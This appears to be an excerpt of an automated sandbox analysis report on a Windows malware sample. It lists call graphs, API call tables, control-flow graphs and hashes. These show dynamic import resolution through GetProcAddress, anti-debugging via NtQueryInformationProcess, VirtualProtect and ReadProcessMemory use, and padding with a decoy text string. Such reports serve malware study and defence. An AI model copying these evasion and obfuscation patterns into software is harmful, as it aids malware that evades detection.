33441->33442 33443 403c80 33442->33443 33444 404980 34 API calls 33443->33444 33445 403c96 33444->33445 33446 404980 34 API calls 33445->33446 33447 403cac 33446->33447 33448 404980 34 API calls 33447->33448 33449 403cc2 33448->33449 33450 404980 34 API calls 33449->33450 33451 403cd8 33450->33451 33452 404980 34 API calls 33451->33452 33453 403cee 33452->33453 33454 404980 34 API calls 33453->33454 33455 403d07 33454->33455 33456 404980 34 API calls 33455->33456 33457 403d1d 33456->33457 33458 404980 34 API calls 33457->33458 33459 403d33 33458->33459 33460 404980 34 API calls 33459->33460 33461 403d49 33460->33461 33462 404980 34 API calls 33461->33462 33463 403d5f 33462->33463 33464 404980 34 API calls 33463->33464 33465 403d75 33464->33465 33466 404980 34 API calls 33465->33466 33467 403d8e 33466->33467 33468 404980 34 API calls 33467->33468 33469 403da4 33468->33469 33470 404980 34 API calls 33469->33470 33471 403dba 33470->33471 33472 404980 34 API calls 33471->33472 33473 403dd0 33472->33473 33474 404980 34 API calls 33473->33474 33475 403de6 33474->33475 33476 404980 34 API calls 33475->33476 33477 403dfc 33476->33477 33478 404980 34 API calls 33477->33478 33479 403e15 33478->33479 33480 404980 34 API calls 33479->33480 33481 403e2b 33480->33481 33482 404980 34 API calls 33481->33482 33483 403e41 33482->33483 33484 404980 34 API calls 33483->33484 33485 403e57 33484->33485 33486 404980 34 API calls 33485->33486 33487 403e6d 33486->33487 33488 404980 34 API calls 33487->33488 33489 403e83 33488->33489 33490 404980 34 API calls 33489->33490 33491 403e9c 33490->33491 33492 404980 34 API calls 33491->33492 33493 403eb2 33492->33493 33494 404980 34 API calls 33493->33494 33495 403ec8 33494->33495 33496 404980 34 API calls 33495->33496 33497 403ede 33496->33497 33498 404980 34 API calls 33497->33498 33499 403ef4 33498->33499 33500 404980 34 API calls 33499->33500 33501 403f0a 33500->33501 33502 404980 34 API calls 33501->33502 33503 403f23 33502->33503 33504 404980 34 API calls 33503->33504 33505 403f39 33504->33505 33506 404980 34 API calls 33505->33506 33507 403f4f 33506->33507 33508 404980 34 API calls 33507->33508 33509 403f65 33508->33509 33510 404980 34 API calls 33509->33510 33511 403f7b 33510->33511 33512 404980 34 API calls 33511->33512 33513 403f91 33512->33513 33514 404980 34 API calls 33513->33514 33515 403faa 33514->33515 33516 404980 34 API calls 33515->33516 33517 403fc0 33516->33517 33518 404980 34 API calls 33517->33518 33519 403fd6 33518->33519 33520 404980 34 API calls 33519->33520 33521 403fec 33520->33521 33522 404980 34 API calls 33521->33522 33523 404002 33522->33523 33524 404980 34 API calls 33523->33524 33525 404018 33524->33525 33526 404980 34 API calls 33525->33526 33527 404031 33526->33527 33528 404980 34 API calls 33527->33528 33529 404047 33528->33529 33530 404980 34 API calls 33529->33530 33531 40405d 33530->33531 33532 404980 34 API calls 33531->33532 33533 404073 33532->33533 33534 404980 34 API calls 33533->33534 33535 404089 33534->33535 33536 404980 34 API calls 33535->33536 33537 40409f 33536->33537 33538 404980 34 API calls 33537->33538 33539 4040b8 33538->33539 33540 404980 34 API calls 33539->33540 33541 4040ce 33540->33541 33542 404980 34 API calls 33541->33542 33543 4040e4 33542->33543 33544 404980 34 API calls 33543->33544 33545 4040fa 33544->33545 33546 404980 34 API calls 33545->33546 33547 404110 33546->33547 33548 404980 34 API calls 33547->33548 33549 404126 33548->33549 33550 404980 34 API calls 33549->33550 33551 40413f 33550->33551 33552 404980 34 API calls 33551->33552 33553 404155 33552->33553 33554 404980 34 API calls 33553->33554 33555 40416b 33554->33555 33556 404980 34 API calls 33555->33556 33557 404181 33556->33557 33558 404980 34 API calls 33557->33558 33559 404197 33558->33559 33560 404980 34 API calls 33559->33560 33561 4041ad 33560->33561 33562 404980 34 API calls 33561->33562 33563 4041c6 33562->33563 33564 404980 34 API calls 33563->33564 33565 4041dc 33564->33565 33566 404980 34 API calls 33565->33566 33567 4041f2 33566->33567 33568 404980 34 API calls 33567->33568 33569 404208 33568->33569 33570 404980 34 API calls 33569->33570 33571 40421e 33570->33571 33572 404980 34 API calls 33571->33572 33573 404234 33572->33573 33574 404980 34 API calls 33573->33574 33575 40424d 33574->33575 33576 404980 34 API calls 33575->33576 33577 404263 33576->33577 33578 404980 34 API calls 33577->33578 33579 404279 33578->33579 33580 404980 34 API calls 33579->33580 33581 40428f 33580->33581 33582 404980 34 API calls 33581->33582 33583 4042a5 33582->33583 33584 404980 34 API calls 33583->33584 33585 4042bb 33584->33585 33586 404980 34 API calls 33585->33586 33587 4042d4 33586->33587 33588 404980 34 API calls 33587->33588 33589 4042ea 33588->33589 33590 404980 34 API calls 33589->33590 33591 404300 33590->33591 33592 404980 34 API calls 33591->33592 33593 404316 33592->33593 33594 404980 34 API calls 33593->33594 33595 40432c 33594->33595 33596 404980 34 API calls 33595->33596 33597 404342 33596->33597 33598 404980 34 API calls 33597->33598 33599 40435b 33598->33599 33600 404980 34 API calls 33599->33600 33601 404371 33600->33601 33602 404980 34 API calls 33601->33602 33603 404387 33602->33603 33604 404980 34 API calls 33603->33604 33605 40439d 33604->33605 33606 404980 34 API calls 33605->33606 33607 4043b3 33606->33607 33608 404980 34 API calls 33607->33608 33609 4043c9 33608->33609 33610 404980 34 API calls 33609->33610 33611 4043e2 33610->33611 33612 404980 34 API calls 33611->33612 33613 4043f8 33612->33613 33614 404980 34 API calls 33613->33614 33615 40440e 33614->33615 33616 404980 34 API calls 33615->33616 33617 404424 33616->33617 33618 404980 34 API calls 33617->33618 33619 40443a 33618->33619 33620 404980 34 API calls 33619->33620 33621 404450 33620->33621 33622 404980 34 API calls 33621->33622 33623 404469 33622->33623 33624 404980 34 API calls 33623->33624 33625 40447f 33624->33625 33626 404980 34 API calls 33625->33626 33627 404495 33626->33627 33628 404980 34 API calls 33627->33628 33629 4044ab 33628->33629 33630 404980 34 API calls 33629->33630 33631 4044c1 33630->33631 33632 404980 34 API calls 33631->33632 33633 4044d7 33632->33633 33634 404980 34 API calls 33633->33634 33635 4044f0 33634->33635 33636 404980 34 API calls 33635->33636 33637 404506 33636->33637 33638 404980 34 API calls 33637->33638 33639 40451c 33638->33639 33640 404980 34 API calls 33639->33640 33641 404532 33640->33641 33642 404980 34 API calls 33641->33642 33643 404548 33642->33643 33644 404980 34 API calls 33643->33644 33645 40455e 33644->33645 33646 404980 34 API calls 33645->33646 33647 404577 33646->33647 33648 404980 34 API calls 33647->33648 33649 40458d 33648->33649 33650 404980 34 API calls 33649->33650 33651 4045a3 33650->33651 33652 404980 34 API calls 33651->33652 33653 4045b9 33652->33653 33654 404980 34 API calls 33653->33654 33655 4045cf 33654->33655 33656 404980 34 API calls 33655->33656 33657 4045e5 33656->33657 33658 404980 34 API calls 33657->33658 33659 4045fe 33658->33659 33660 404980 34 API calls 33659->33660 33661 404614 33660->33661 33662 404980 34 API calls 33661->33662 33663 40462a 33662->33663 33664 404980 34 API calls 33663->33664 33665 404640 33664->33665 33666 404980 34 API calls 33665->33666 33667 404656 33666->33667 33668 404980 34 API calls 33667->33668 33669 40466c 33668->33669 33670 404980 34 API calls 33669->33670 33671 404685 33670->33671 33672 404980 34 API calls 33671->33672 33673 40469b 33672->33673 33674 404980 34 API calls 33673->33674 33675 4046b1 33674->33675 33676 404980 34 API calls 33675->33676 33677 4046c7 33676->33677 33678 404980 34 API calls 33677->33678 33679 4046dd 33678->33679 33680 404980 34 API calls 33679->33680 33681 4046f3 33680->33681 33682 404980 34 API calls 33681->33682 33683 40470c 33682->33683 33684 404980 34 API calls 33683->33684 33685 404722 33684->33685 33686 404980 34 API calls 33685->33686 33687 404738 33686->33687 33688 404980 34 API calls 33687->33688 33689 40474e 33688->33689 33690 404980 34 API calls 33689->33690 33691 404764 33690->33691 33692 404980 34 API calls 33691->33692 33693 40477a 33692->33693 33694 404980 34 API calls 33693->33694 33695 404793 33694->33695 33696 404980 34 API calls 33695->33696 33697 4047a9 33696->33697 33698 404980 34 API calls 33697->33698 33699 4047bf 33698->33699 33700 404980 34 API calls 33699->33700 33701 4047d5 33700->33701 33702 404980 34 API calls 33701->33702 33703 4047eb 33702->33703 33704 404980 34 API calls 33703->33704 33705 404801 33704->33705 33706 404980 34 API calls 33705->33706 33707 40481a 33706->33707 33708 404980 34 API calls 33707->33708 33709 404830 33708->33709 33710 404980 34 API calls 33709->33710 33711 404846 33710->33711 33712 404980 34 API calls 33711->33712 33713 40485c 33712->33713 33714 404980 34 API calls 33713->33714 33715 404872 33714->33715 33716 404980 34 API calls 33715->33716 33717 404888 33716->33717 33718 404980 34 API calls 33717->33718 33719 4048a1 33718->33719 33720 404980 34 API calls 33719->33720 33721 4048b7 33720->33721 33722 404980 34 API calls 33721->33722 33723 4048cd 33722->33723 33724 404980 34 API calls 33723->33724 33725 4048e3 33724->33725 33726 404980 34 API calls 33725->33726 33727 4048f9 33726->33727 33728 404980 34 API calls 33727->33728 33729 40490f 33728->33729 33730 404980 34 API calls 33729->33730 33731 404928 33730->33731 33732 404980 34 API calls 33731->33732 33733 40493e 33732->33733 33734 404980 34 API calls 33733->33734 33735 404954 33734->33735 33736 404980 34 API calls 33735->33736 33737 40496a 33736->33737 33739 404a9a 6 API calls 33738->33739 33740 404a1e 33738->33740 33739->33107 33741 404a26 11 API calls 33740->33741 33741->33739 33741->33741 34306 9f0b4f 1730 API calls 34254 9f964e 6 API calls 2 library calls 34307 9f7b47 5 API calls 3 library calls 34308 405799 57 API calls 34173 9f2417 ReadProcessMemory ReadProcessMemory VirtualQueryEx ??_V@YAXPAX 34255 9ec642 22 API calls 34309 9e8f43 StrCmpCA ExitProcess strtok_s strtok_s 34310 4097a0 165 API calls 34258 9eae79 114 API calls 34209 9d7557 VirtualProtect 34175 408ca9 ??2@YAPAXI strlen malloc strcpy_s RaiseException 34260 9f5e74 memmove RaiseException __CxxThrowException@8 34210 9e6970 492 API calls 34261 9d1673 8 API calls 34311 9e3f70 238 API calls 34211 9e890d 46 API calls 34312 9e870e strtok_s 34212 9f2d67 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 34313 9f2f67 11 API calls 34262 9db660 92 API calls 34263 9e7260 142 API calls
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0040602F
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406082
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060B5
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060E5
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406120
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406153
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406163
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------
                                                      • API String ID: 2041821634-2370822465
                                                      • Opcode ID: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
                                                      • Instruction ID: 2125bc0cde9220f82915efd50208f228c039266d2a321542d2fdd7d2ceb0accf
                                                      • Opcode Fuzzy Hash: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
                                                      • Instruction Fuzzy Hash: FE525E71A006159BDB20AFB5DD89B9F77B5AF04304F15503AF905B72E1DB78DC028BA8
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00404BAF
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C02
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C35
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C65
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CA3
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CD6
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404CE6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------
                                                      • API String ID: 2041821634-2370822465
                                                      • Opcode ID: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
                                                      • Instruction ID: ee9b337c920fa440a166249251ede5a47d7364bfc35f9bc5310ef1df1bec01ed
                                                      • Opcode Fuzzy Hash: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
                                                      • Instruction Fuzzy Hash: C5526E71A006169BDB10AFA5DC49B9F7BB5AF44304F14503AF904B72A1DB78ED42CBE8

                                                      Control-flow Graph

                                                      APIs
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404994
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040499B
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A2
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A9
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049B0
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004049BB
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 004049C2
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D2
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D9
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E0
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E7
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049EE
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049F9
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A00
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A07
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A0E
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A15
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A2B
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A32
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A39
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A40
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A47
                                                      • LdrInitializeThunk.NTDLL ref: 00404A4F
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A73
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7A
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A81
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A88
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A8F
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A9F
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AA6
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AAD
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB4
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ABB
                                                      • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404AD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrlen$Heap$AllocateInitializeProcessProtectThunkVirtual
                                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                      • API String ID: 2971326882-3329630956
                                                      • Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                      • Instruction ID: 31bf12c2d79e338fb7f97826348345d32b3aa4c96b478bc01bd0f7d9a8ca19b4
                                                      • Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                      • Instruction Fuzzy Hash: F531E920F4823C7F86206BA56C45BDFBED4DF8E750F389053F51855184C9A864058EE9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2207 4263c0-4263ed GetPEB 2208 4265f3-426653 LoadLibraryA * 5 2207->2208 2209 4263f3-4265ee call 426320 GetProcAddress * 20 2207->2209 2211 426655-426663 GetProcAddress 2208->2211 2212 426668-42666f 2208->2212 2209->2208 2211->2212 2214 426671-426697 GetProcAddress * 2 2212->2214 2215 42669c-4266a3 2212->2215 2214->2215 2216 4266a5-4266b3 GetProcAddress 2215->2216 2217 4266b8-4266bf 2215->2217 2216->2217 2219 4266c1-4266cf GetProcAddress 2217->2219 2220 4266d4-4266db 2217->2220 2219->2220 2221 426707-42670a 2220->2221 2222 4266dd-426702 GetProcAddress * 2 2220->2222 2222->2221
                                                      APIs
                                                      • GetProcAddress.KERNEL32(77190000,00A579F0), ref: 00426419
                                                      • GetProcAddress.KERNEL32(77190000,00A579C0), ref: 00426432
                                                      • GetProcAddress.KERNEL32(77190000,00A57A68), ref: 0042644A
                                                      • GetProcAddress.KERNEL32(77190000,00A579D8), ref: 00426462
                                                      • GetProcAddress.KERNEL32(77190000,00A76940), ref: 0042647B
                                                      • GetProcAddress.KERNEL32(77190000,00A55FF8), ref: 00426493
                                                      • GetProcAddress.KERNEL32(77190000,00A56058), ref: 004264AB
                                                      • GetProcAddress.KERNEL32(77190000,00A57A20), ref: 004264C4
                                                      • GetProcAddress.KERNEL32(77190000,00A57A38), ref: 004264DC
                                                      • GetProcAddress.KERNEL32(77190000,00A57A50), ref: 004264F4
                                                      • GetProcAddress.KERNEL32(77190000,00A76C28), ref: 0042650D
                                                      • GetProcAddress.KERNEL32(77190000,00A55F38), ref: 00426525
                                                      • GetProcAddress.KERNEL32(77190000,00A76CB8), ref: 0042653D
                                                      • GetProcAddress.KERNEL32(77190000,00A76DC0), ref: 00426556
                                                      • GetProcAddress.KERNEL32(77190000,00A55F98), ref: 0042656E
                                                      • GetProcAddress.KERNEL32(77190000,00A76C88), ref: 00426586
                                                      • GetProcAddress.KERNEL32(77190000,00A76B80), ref: 0042659F
                                                      • GetProcAddress.KERNEL32(77190000,00A56258), ref: 004265B7
                                                      • GetProcAddress.KERNEL32(77190000,00A76E20), ref: 004265CF
                                                      • GetProcAddress.KERNEL32(77190000,00A55EF8), ref: 004265E8
                                                      • LoadLibraryA.KERNEL32(00A76D30,?,?,?,00421BE3), ref: 004265F9
                                                      • LoadLibraryA.KERNEL32(00A76E08,?,?,?,00421BE3), ref: 0042660B
                                                      • LoadLibraryA.KERNEL32(00A76D48,?,?,?,00421BE3), ref: 0042661D
                                                      • LoadLibraryA.KERNEL32(00A76DD8,?,?,?,00421BE3), ref: 0042662E
                                                      • LoadLibraryA.KERNEL32(00A76BC8,?,?,?,00421BE3), ref: 00426640
                                                      • GetProcAddress.KERNEL32(76850000,00A76BE0), ref: 0042665D
                                                      • GetProcAddress.KERNEL32(77040000,00A76DF0), ref: 00426679
                                                      • GetProcAddress.KERNEL32(77040000,00A76BF8), ref: 00426691
                                                      • GetProcAddress.KERNEL32(75A10000,00A76B38), ref: 004266AD
                                                      • GetProcAddress.KERNEL32(75690000,00A56118), ref: 004266C9
                                                      • GetProcAddress.KERNEL32(776F0000,00A769C0), ref: 004266E5
                                                      • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 004266FC
                                                      Strings
                                                      • NtQueryInformationProcess, xrefs: 004266F1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
